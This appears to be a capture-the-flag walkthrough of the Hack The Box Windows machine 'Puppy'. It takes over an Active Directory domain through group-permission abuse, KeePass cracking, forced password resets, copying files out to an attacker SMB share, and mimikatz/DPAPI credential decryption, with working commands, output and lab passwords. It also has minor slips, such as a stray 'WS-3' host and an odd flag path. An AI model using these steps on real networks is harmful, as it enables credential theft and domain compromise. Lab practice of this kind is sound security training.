> m4rt@CTF_ARCHIVE:~$

Hack The Box / WINDOWS / 2026-03-18

Hack The Box — Puppy (Windows)

AD graph abuse from provided credentials to access DEV share and KeePass secrets, multi-user password control pivots, and DPAPI credential decryption to reach steph.cooper_adm and root.

Target

  • IP: 10.129.232.226

Machine information

As is common in real-life pentests, you start the Puppy box with credentials for the following account:

  • levi.james / KingofAkron2025!

Recon

sudo nmap -sC -sV 10.129.232.226 -p- -T5 -v

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-18 22:12:46Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
3260/tcp  open  iscsi?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49691/tcp open  msrpc         Microsoft Windows RPC
61853/tcp open  msrpc         Microsoft Windows RPC
62008/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

nxc smb 10.129.232.226 -u 'levi.james' -p 'KingofAkron2025!' --shares

SMB         10.129.232.226  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB         10.129.232.226  445    DC               [*] Enumerated shares
SMB         10.129.232.226  445    DC               Share           Permissions     Remark
SMB         10.129.232.226  445    DC               -----           -----------     ------
SMB         10.129.232.226  445    DC               ADMIN$                          Remote Admin
SMB         10.129.232.226  445    DC               C$                              Default share
SMB         10.129.232.226  445    DC               DEV                             DEV-SHARE for PUPPY-DEVS
SMB         10.129.232.226  445    DC               IPC$            READ            Remote IPC
SMB         10.129.232.226  445    DC               NETLOGON        READ            Logon server share
SMB         10.129.232.226  445    DC               SYSVOL          READ            Logon server share

The DEV share looks interesting, but for now we cannot access it.

nxc ldap 10.129.232.226 -u 'levi.james' -p 'KingofAkron2025!'

SMB         10.129.232.226  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
LDAP        10.129.232.226  389    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!

Add puppy.htb to /etc/hosts.

ldapdomaindump puppy.htb -u 'puppy.htb\levi.james' -p 'KingofAkron2025!'

From domain_computers.html we see there is a host called DC.

Add dc.puppy.htb to /etc/hosts.

From domain_users.json we discover these users:

steph.cooper_adm
steph.cooper
jamie.williams
adam.silver
ant.edwards
levi.james
krbtgt
Guest
Administrator

Put them in a users.txt file.

Or:

nxc smb dc.puppy.htb -d puppy.htb -u 'levi.james' -p 'KingofAkron2025!' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt

Additionally, there is user DC$.

bloodhound-python -u 'levi.james' -p 'KingofAkron2025!' -ns 10.129.232.226 -d 'puppy.htb' -dc 'dc.puppy.htb' -c All --zip

A zip file is created.

sudo bloodhound

Upload the zip.

Old BloodHound legacy queries:

  • https://github.com/SpecterOps/BloodHound-Legacy/blob/master/src/components/SearchContainer/Tabs/PrebuiltQueries.json

In BloodHound click levi.james --> outbound object control.

We see levi.james is part of group HR, which has a GenericWrite relationship to group DEVELOPERS.

Click group developers --> members.

We see members are ant.edwards, adam.silver, and jamie.williams.

net rpc group addmem "developers" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "dc.puppy.htb"

net rpc group members "developers" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "dc.puppy.htb"

We confirm levi.james is in the group.

nxc smb 10.129.232.226 -u 'levi.james' -p 'KingofAkron2025!' --shares

Now we can read the DEV share.

smbclient -U levi.james '\\10.129.232.226\DEV'

dir
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 08:09:12 2025
  Projects                            D        0  Sat Mar  8 17:53:36 2025
  recovery.kdbx                       A     2677  Wed Mar 12 03:25:46 2025

Inside Projects there is nothing.

Download recovery.kdbx.

./john/run/keepass2john recovery.kdbx > john_hash.txt
./john/run/john --wordlist=./rockyou.txt john_hash.txt

We get password: liverpool.

keepassxc-cli export recovery.kdbx > output.xml

Enter the discovered password.

We find, presumably:

  • password of jamie.williams: JamieLove2025!
  • password of adam.silver: HJKL2025!
  • password of ant.edwards: Antman2025!

Put these passwords and the one of levi.james in a passwords.txt file.

nxc smb puppy.htb -u users.txt -p passwords.txt --continue-on-success

We find:

SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025!

From BloodHound we see ant.edwards is in group SENIOR DEVS, which has a GenericAll relationship over adam.silver.

Download bloodyAD:

  • https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host 'dc.puppy.htb' -d puppy.htb --dc-ip dc.puppy.htb -u 'ant.edwards' -p 'Antman2025!' set password 'adam.silver' '!Kali12345678!'

[+] Password changed successfully!

nxc smb puppy.htb -u 'adam.silver' -p '!Kali12345678!'

SMB         10.129.232.226  445    DC               [-] PUPPY.HTB\adam.silver:!Kali12345678! STATUS_ACCOUNT_DISABLED

getTGT.py 'puppy.htb'/'adam.silver':'!Kali12345678!' -dc-ip dc.puppy.htb

Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

We need to enable adam.silver.

python3 bloodyAD/bloodyAD.py -d puppy.htb --host dc.puppy.htb --dc-ip dc.puppy.htb -u 'ant.edwards' -p 'Antman2025!' remove uac adam.silver -f ACCOUNTDISABLE

[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl

nxc smb puppy.htb -u 'adam.silver' -p '!Kali12345678!'

SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\adam.silver:!Kali12345678!

From BloodHound we notice adam.silver is in group REMOTE MANAGEMENT USERS.

evil-winrm -i dc.puppy.htb -u 'adam.silver' -p '!Kali12345678!'

We get a PowerShell shell on the target machine as adam.silver.

cd \Backups
ls
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip

Download it.

On attacker machine run:

smbserver.py -smb2support -username test12 -password test12 share $(pwd)

On target machine run:

net use \\10.10.14.252\share test12 /USER:test12
cp site-backup-2024-12-30.zip \\10.10.14.252\share\

Now we have the file on the attacker machine.

unzip site-backup-2024-12-30.zip

In file nms-auth-config.xml.bak we find:

    <server>
        <host>DC.PUPPY.HTB</host>
        <port>389</port>
        <base-dn>dc=PUPPY,dc=HTB</base-dn>
        <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
        <bind-password>ChefSteph2025!</bind-password>
    </server>

nxc smb puppy.htb -u users.txt -p 'ChefSteph2025!' --continue-on-success

SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\steph.cooper:ChefSteph2025!

evil-winrm -i dc.puppy.htb -u 'steph.cooper' -p 'ChefSteph2025!'

We get a PowerShell shell on the target machine as steph.cooper.

cd C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
ls -h

There is a file C8D69EBE9A43E9DEBF6B5FBD48B521B9.

type C8D69EBE9A43E9DEBF6B5FBD48B521B9

We notice:

Enterprise Credential Data

These are credentials encrypted with a master key.

Upload mimikatz.exe on WS-3:

  • https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe
C:\tmp\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" exit

The masterkey has GUID:

guidMasterKey      : {556a2412-1275-4ccf-b721-e6a0b4f90407}

The master key is in file C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<sid>\<guid>, where sid is the current user SID and guid is the master key GUID.

whoami /all

We see that SID of steph.cooper is S-1-5-21-1487982659-1829050783-2281216199-1107.

certutil -encode C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 C:\tmp\masterkey_encoded.txt
type C:\tmp\masterkey_encoded.txt

Copy the base64 data into file roba.b64 on attacker machine.

base64 -d roba.b64 > masterkey

dpapi.py masterkey -file masterkey -sid 'S-1-5-21-1487982659-1829050783-2281216199-1107' -password 'ChefSteph2025!'

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

On target machine, run:

certutil -encode C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 C:\tmp\cred_encoded.txt
type C:\tmp\cred_encoded.txt

Copy the base64 data into roba.b64.

base64 -d roba.b64 > cred

dpapi.py credential -file cred -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description :
Unknown     :
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

nxc smb puppy.htb -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!'

SMB         10.129.54.90    445    DC               [+] PUPPY.HTB\steph.cooper_adm:FivethChipOnItsWay2025! (Pwn3d!)

evil-winrm -i dc.puppy.htb -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!'

We get a PowerShell shell as steph.cooper_adm.

We can retrieve the root flag in C:\Administrator\Desktop\root.txt.